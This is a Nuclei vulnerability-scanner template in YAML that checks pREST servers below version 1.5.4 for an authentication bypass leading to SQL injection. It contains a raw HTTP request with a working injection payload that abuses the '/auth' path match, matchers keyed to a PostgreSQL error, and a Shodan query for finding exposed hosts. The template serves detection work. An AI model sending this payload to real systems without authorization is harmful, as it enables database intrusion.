nuclei-templates/http/vulnerabilities/other/prest-sqli-auth-bypass.yaml

37 lines
1.0 KiB
YAML
Raw Normal View History

2024-08-28 14:22:10 +00:00
id: prest-sqli-auth-bypass
info:
2024-08-29 04:06:14 +00:00
name: pREST < 1.5.4 - SQL Injection Via Authentication Bypass
2024-08-28 14:22:10 +00:00
author: mihail8531,iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An authentication bypass vulnerability was introduced by changing the JWT whitelist configuration to use a regex pattern, allowing unauthorized access to any path containing /auth and leading to SQL Injection.
reference:
- https://github.com/advisories/GHSA-wm25-j4gw-6vr3
metadata:
verified: true
max-request: 1
shodan-query: html:"authorization token is empty"
2024-08-29 04:06:14 +00:00
tags: sqli,prest,auth-bypass,sqli
2024-08-28 14:22:10 +00:00
variables:
database: "{{database}}"
http:
- raw:
- |
GET /{{database}}/information_schema".tables)s%20where%201=version()::int--/auth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'pq: invalid input syntax for type integer: \"PostgreSQL '
- type: word
part: content_type
words:
- 'application/json'